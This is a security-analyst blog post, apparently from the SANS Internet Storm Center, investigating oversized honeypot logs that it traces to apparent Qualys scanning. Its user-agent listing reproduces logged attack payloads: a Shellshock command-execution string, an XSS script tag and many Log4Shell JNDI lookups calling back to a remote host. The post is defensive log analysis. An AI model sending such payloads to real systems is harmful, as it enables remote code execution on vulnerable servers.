Overflowing Web Honeypot Logs

Published: 2023-11-20. Last Updated: 2023-11-20 00:04:09 UTC
by Jesse La Grew (Version: 1)

While reviewing one of my honeypots to convert some of the JSON data, I noticed some of my files were much larger than I expected. That raises the question: how large should these files normally be, and why are some of them so large? To summarize this data more easily, it seemed like a good idea to write another Python script.

import os
from statistics import mean, median

# function to print file size summaries for data sources
def print_stats(file_size_list, file_source):
    print(f"Total {file_source} files: {len(file_size_list)}")
    # min(), max(), median() and mean() all raise an error on an empty list
    if not file_size_list:
        print("No files found\n")
        return
    print(f"Low value: {round(min(file_size_list), 2)} MB")
    print(f"High value: {round(max(file_size_list), 2)} MB")
    print(f"Median: {round(median(file_size_list), 2)} MB")
    print(f"Mean: {round(mean(file_size_list), 2)} MB\n")

# get file sizes for files in list, convert to MB and return as a list
def get_file_sizes(file_list):
    file_sizes = []
    for eachfile in file_list:
        file_sizes.append(os.stat(eachfile).st_size / (1024 * 1024))
    return file_sizes

# initialize empty lists
cowrie_files = []
webhoneypot_files = []
cowrie_file_sizes = []
webhoneypot_file_sizes = []

# get files in the current directory
# anything starting with "cowrie.json" is a cowrie log
# anything starting with "webhoneypot-" is a web honeypot log
# append file names to the appropriate list
for eachfile in os.listdir():
    if eachfile.startswith("cowrie.json"):
        cowrie_files.append(eachfile)
    elif eachfile.startswith("webhoneypot-"):
        webhoneypot_files.append(eachfile)

# get file sizes for two sets of files
cowrie_file_sizes = get_file_sizes(cowrie_files)
webhoneypot_file_sizes = get_file_sizes(webhoneypot_files)

# print out results
print_stats(cowrie_file_sizes,"Cowrie")
print_stats(webhoneypot_file_sizes,"Web Honeypot")

 

Since I keep a backup of my logs in one directory, I just needed to run this script from that location. My data was limited due to some updates over the last couple of months, but it did highlight some outliers. 

Total Cowrie files: 40
Low value: 18.13 MB
High value: 197.12 MB
Median: 29.9 MB
Mean: 34.55 MB

Total Web Honeypot files: 107
Low value: 0.05 MB
High value: 9471.03 MB <-- Much higher than what is seen most of the time
Median: 7.75 MB
Mean: 269.66 MB

The median gives a good indication of the file sizes to expect from these kinds of logs, at least for this device. It's also less influenced by outliers than the mean.

  • Cowrie logs: 29.9 MB
  • Web Honeypot logs: 7.75 MB

The web honeypot logs are usually small, roughly a quarter the size of the cowrie logs per day. However, the maximum size ("high value") was over 9 GB. That's more than 1,000 times the median.


Figure 1: Highlighted web honeypot logs, GBs in size, much higher than the median

There were multiple days when these files were over 1 GB in size (listed chronologically):

  • 8/29/2023
  • 9/26/2023
  • 9/27/2023
  • 10/31/2023
  • 11/1/2023
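
A list like the one above can be pulled together with a few lines of Python. This is only a minimal sketch, not the method used for this diary: the function name `find_large_logs` and the 1 GB threshold constant are assumptions for illustration, and it relies on the `webhoneypot-YYYY-MM-DD.json` naming seen in the commands in this post.

```python
import os

BYTES_PER_GB = 1024 ** 3  # assumed threshold of 1 GB, matching the text above


def find_large_logs(directory=".", prefix="webhoneypot-", threshold=BYTES_PER_GB):
    """Return (file name, size in GB) pairs for files larger than threshold bytes."""
    large = []
    for entry in os.scandir(directory):
        if entry.is_file() and entry.name.startswith(prefix):
            size = entry.stat().st_size
            if size > threshold:
                large.append((entry.name, size / BYTES_PER_GB))
    # the date is embedded in the file name (YYYY-MM-DD), so sorting by
    # name also sorts the results chronologically
    return sorted(large)


if __name__ == "__main__":
    for name, size_gb in find_large_logs():
        print(f"{name}: {size_gb:.2f} GB")
```

Run from the log backup directory, this prints one line per oversized web honeypot log.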

So what happened on these days that was so unusual? Was it a particular source or something more distributed from multiple sources? Since it's a lot of data to process, I decided to take a look day by day for any potential outliers, starting with source IP addresses.

cat webhoneypot-2023-08-29.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
2963943 "80.243.171.172"
  50480 "43.163.232.152"
   3846 "185.44.82.40"
   3304 "205.169.39.71"
   1719 "205.169.39.211"
   1707 "45.128.232.183"
   1702 "65.49.1.93"
   1678 "205.169.39.154"
   1532 "64.62.197.148"
   1426 "205.169.39.114"


cat webhoneypot-2023-09-26.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
12988686 "80.243.171.172"
   5713 "65.154.226.167"
   4826 "65.154.226.170"
   3598 "65.154.226.171"
   3419 "65.154.226.168"
   3003 "65.154.226.166"
   2894 "65.154.226.169"
    876 "209.159.153.74"
    871 "141.98.7.19"
    810 "205.169.39.124"


cat webhoneypot-2023-09-27.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
4971285 "80.243.171.172"
   1489 "65.154.226.166"
   1115 "65.154.226.171"
   1083 "65.154.226.170"
    984 "205.169.39.241"
    849 "65.154.226.169"
    779 "205.169.39.139"
    684 "209.159.153.74"
    604 "205.169.39.83"
    555 "43.134.109.119"


cat webhoneypot-2023-10-31.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
11595650 "80.243.171.172"
   3720 "80.94.95.226"
    922 "152.32.143.233"
    695 "83.97.73.87"
    619 "167.94.138.52"
    536 "80.82.77.202"
    488 "134.122.106.248"
    434 "84.54.51.190"
    423 "47.89.134.184"
    371 "104.199.31.214"


cat webhoneypot-2023-11-01.json | jq .sip | sort | uniq -c | sort -rn | head -n 10
4454361 "80.243.171.172"
    932 "159.223.4.194"
    919 "80.94.95.226"
    528 "43.135.86.121"
    306 "193.35.18.33"
    292 "205.210.31.227"
    217 "35.203.210.129"
    189 "109.237.97.180"
    179 "45.128.232.125"
    155 "162.243.151.30"

 

On each of these days, the overwhelming majority of requests came from 80.243.171.172. Looking into the PCAP data only made this more interesting.
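
The same per-source tally can be approximated in Python, which may be convenient when the counts feed into further processing. This is a rough sketch under one assumption that the jq commands do not need: each log line holds exactly one JSON object. The "sip" key comes from the commands above; the function names are made up for illustration. Unlike `jq .sip`, records without a "sip" key are skipped rather than counted as null.

```python
import json
from collections import Counter


def count_source_ips(lines):
    """Count the "sip" value of each JSON record in an iterable of lines."""
    counts = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or malformed lines
        if isinstance(record, dict) and "sip" in record:
            counts[record["sip"]] += 1
    return counts


def top_sources(path, n=10):
    """Return the n most frequent source IPs in one log file."""
    # the file is streamed line by line, so multi-GB logs are never
    # loaded into memory at once
    with open(path, encoding="utf-8", errors="replace") as handle:
        return count_source_ips(handle).most_common(n)
```

Calling top_sources("webhoneypot-2023-08-29.json") would return a list of (address, count) pairs, most frequent first.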


Figure 2: Wireshark example of access from IP address that may indicate a Qualys scan [1]

 

The data indicated that this may be a Qualys vulnerability scan, which many organizations use to understand their attack surface and public vulnerabilities. Similar "Qualys" text also appeared in the ICMP traffic surrounding this example. HTTP data after this also showed similar information. 


Figure 3: Wireshark display of QualysGuard in user-agent of HTTP data

 

The web honeypot logs also had some log indicators that this may be vulnerability scan traffic. 


Figure 4: Web honeypot logs showing "qualys-scan" key within the header data. 

 

Back to one of the JSON log files to see what other user agent strings may exist. 

cat webhoneypot-2023-10-31.json | jq 'select(.sip=="80.243.171.172")' \
| jq 'select(.useragent!="")' | jq '.useragent[]' | sort | uniq -c | sort -rn

 738913 "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0"
 419628 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"
  22000 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
  17317 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"
  15985 "curl/7.47.0"
  10470 "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0"
   7548 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)"
   6650 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)"
   5524 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
   5307 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
   4578 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
   4326 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0"
   4071 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
   3781 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
   3433 "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
   2627 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
   2418 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
   2255 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14)"
   2199 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
   2138 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
   2031 "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
   2006 "<script>alert(Qualys)</script>"
   1986 "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id"
   1980 "curl/7.60.0"
   1965 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
   1922 "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
   1917 "Mozilla/5.0"
   1814 "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
   1794 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
   1709 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101"
   1642 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
   1613 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
   1214 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729);"
   1137 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
   1124 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0"
   1090 "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
   1085 "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36"
   1028 "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16"
   1006 "Node.js"
   1003 "curl/7.29.0"
    955 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
    935 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
    904 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
    885 "${jndi:corba://10.10.11.42:42053/QUALYSTEST}"
    884 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
    866 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0"
    856 "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0"
    849 "Java/1.8.0_161"
    840 "${jndi:ldap://10.10.11.42:36802/QUALYSTEST}"
    821 "Gecko/20100914"
    818 "ZX-80 SPECTRUM"
    805 "Java/1.8.0_102"
    804 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
    788 "${jndi:corba://10.10.11.42:45518/QUALYSTEST}"
    783 "${jndi:http://10.10.11.42:38541/QUALYSTEST}"
    746 "${jndi:nis://10.10.11.42:39490/QUALYSTEST}"
    716 "${jndi:http://10.10.11.42:40385/QUALYSTEST}"
    670 "${jndi:corba://10.10.11.42:35892/QUALYSTEST}"
    667 "${jndi:ldaps://10.10.11.42:40503/QUALYSTEST}"
    665 "${jndi:nds://10.10.11.42:32940/QUALYSTEST}"
    657 "${jndi:nis://10.10.11.42:38126/QUALYSTEST}"
    589 "${jndi:rmi://10.10.11.42:41209/QUALYSTEST}"
    586 "${jndi:dns://10.10.11.42:35937/QUALYSTEST}"
    573 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0"
    554 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
    541 "${jndi:nis://10.10.11.42:41346/QUALYSTEST}"
    540 "${jndi:nds://10.10.11.42:40149/QUALYSTEST}"
    538 "${jndi:nds://10.10.11.42:38541/QUALYSTEST}"
    529 "${jndi:ldaps://10.10.11.42:45149/QUALYSTEST}"
    521 "${jndi:iiop://10.10.11.42:42896/QUALYSTEST}"
    520 "${jndi:corba://10.10.11.42:45367/QUALYSTEST}"
    513 "${jndi:http://10.10.11.42:43708/QUALYSTEST}"
    508 "${jndi:rmi://10.10.11.42:36829/QUALYSTEST}"
    502 "${jndi:ldap://10.10.11.42:41141/QUALYSTEST}"
    481 "${jndi:nds://10.10.11.42:40385/QUALYSTEST}"
    465 "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101"
    432 ": Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
    430 "${jndi:nis://10.10.11.42:38444/QUALYSTEST}"
    428 "${jndi:http://10.10.11.42:40149/QUALYSTEST}"
    410 "${jndi:rmi://10.10.11.42:45149/QUALYSTEST}"
    384 "${jndi:rmi://10.10.11.42:35898/QUALYSTEST}"
    358 "${jndi:iiop://10.10.11.42:42053/QUALYSTEST}"
    347 "${jndi:iiop://10.10.11.42:45367/QUALYSTEST}"
    323 "${jndi:ldap://10.10.11.42:46567/QUALYSTEST}"
    322 "${jndi:nds://10.10.11.42:43708/QUALYSTEST}"
    318 "${jndi:ldap://10.10.11.42:40635/QUALYSTEST}"
    312 "${jndi:iiop://10.10.11.42:45518/QUALYSTEST}"
    308 "${jndi:rmi://10.10.11.42:40503/QUALYSTEST}"
    269 "${jndi:ldap://10.10.11.42:36326/QUALYSTEST}"
    252 "${jndi:dns://10.10.11.42:39490/QUALYSTEST}"
    233 "${jndi:dns://10.10.11.42:38126/QUALYSTEST}"
    211 "${jndi:corba://10.10.11.42:42896/QUALYSTEST}"
    200 "${jndi:iiop://10.10.11.42:35892/QUALYSTEST}"
    185 "${jndi:dns://10.10.11.42:41346/QUALYSTEST}"
    180 "${jndi:ldaps://10.10.11.42:41209/QUALYSTEST}"
    146 "${jndi:ldaps://10.10.11.42:36829/QUALYSTEST}"
    105 "${jndi:http://10.10.11.42:32940/QUALYSTEST}"
     78 "${jndi:dns://10.10.11.42:38444/QUALYSTEST}"
     77 "${jndi:ldaps://10.10.11.42:35898/QUALYSTEST}"
     75 "${jndi:nis://10.10.11.42:35937/QUALYSTEST}"
      1 "QualysGuard"

 

There are many references to "Qualys" in these different user agent strings. This may be a vulnerability scan, but I was unable to find a supporting Qualys document referencing this particular IP address. In many cases, vendors will list the IP addresses being used to scan. This can be helpful to tune settings for these kinds of scans, including log verbosity and firewall rules.
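
To get a feel for how much of this traffic announces itself, the counted user agents can be split by whether they contain the text "qualys". The sketch below is illustrative only: the function name `split_by_marker` is an assumption, and the sample rows are four entries copied from the listing above rather than the full data set.

```python
def split_by_marker(counted_agents, marker="qualys"):
    """Sum request counts for user agents with and without the marker text.

    counted_agents is an iterable of (user_agent, count) pairs. The match
    is case-insensitive, so "QualysGuard" and "QUALYSTEST" both count.
    """
    marked = 0
    unmarked = 0
    for user_agent, count in counted_agents:
        if marker in user_agent.lower():
            marked += count
        else:
            unmarked += count
    return marked, unmarked


if __name__ == "__main__":
    # a few rows taken from the listing above
    sample = [
        ("<script>alert(Qualys)</script>", 2006),
        ("${jndi:ldap://10.10.11.42:36802/QUALYSTEST}", 840),
        ("curl/7.47.0", 15985),
        ("QualysGuard", 1),
    ]
    marked, unmarked = split_by_marker(sample)
    print(f"with marker: {marked}, without marker: {unmarked}")
```

A request without the marker is not necessarily unrelated to the scan; as the listing shows, most requests from this address used ordinary browser user agent strings.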

This honeypot is located in my home, so I would have anticipated a more localized scanner. Multiple sources place this IP address in Vienna. Either way, these kinds of scans can fill up storage quickly. When I went back to my SIEM, I noticed I couldn't pull together a chart over time for the last two months. There's a storage limit, and older data had been removed to stay within it. Luckily, I had local files to come back to. This highlights some good reminders:

  • Determine a baseline for traffic volume or log storage, and plan storage accordingly.
  • Alert on deviations from the baseline volumes.
  • Regularly tune the baseline to adjust for changes over time.
  • Any scan traffic can fill up logs quickly, legitimate or not.
  • Tools used to aggregate logs may lose data if other attacks fill up storage.
  • Consider options to retain more data, including retaining the raw logs themselves.
  • If you're using a vulnerability scanner, consider how this will impact any local or aggregated log storage, including workstations, servers, networking equipment, etc.
  • Running 'jq' queries can take a lot of time. Having faster query mechanisms, like a SIEM with all your data, can save time.
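
The first two reminders could be sketched as follows. This is one possible approach, not a recommendation for a specific threshold: it uses the median as the baseline (since it is less influenced by outliers) and the median absolute deviation (MAD) as the measure of spread. The function name `flag_outliers` and the multiplier `k=10` are assumptions that would need tuning for real data.

```python
from statistics import median


def flag_outliers(sizes_mb, k=10.0):
    """Return (baseline, limit, outliers) for a list of daily log sizes in MB.

    baseline is the median size, limit is baseline + k * MAD, and outliers
    are the sizes above that limit. k is an arbitrary tuning value.
    """
    baseline = median(sizes_mb)
    # median absolute deviation: the typical distance from the baseline
    mad = median(abs(size - baseline) for size in sizes_mb)
    limit = baseline + k * mad
    outliers = [size for size in sizes_mb if size > limit]
    return baseline, limit, outliers


if __name__ == "__main__":
    # made-up daily sizes plus the 9471.03 MB high value reported above
    daily_sizes = [7.0, 8.0, 7.5, 8.2, 7.75, 9471.03]
    baseline, limit, outliers = flag_outliers(daily_sizes)
    print(f"baseline: {baseline:.2f} MB, alert above: {limit:.2f} MB")
    print(f"outliers: {outliers}")
```

If every day is nearly identical, the MAD approaches zero and almost any increase gets flagged, so a minimum threshold may be worth adding in practice.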

[1] https://www.qualys.com/

--
Jesse La Grew
Handler
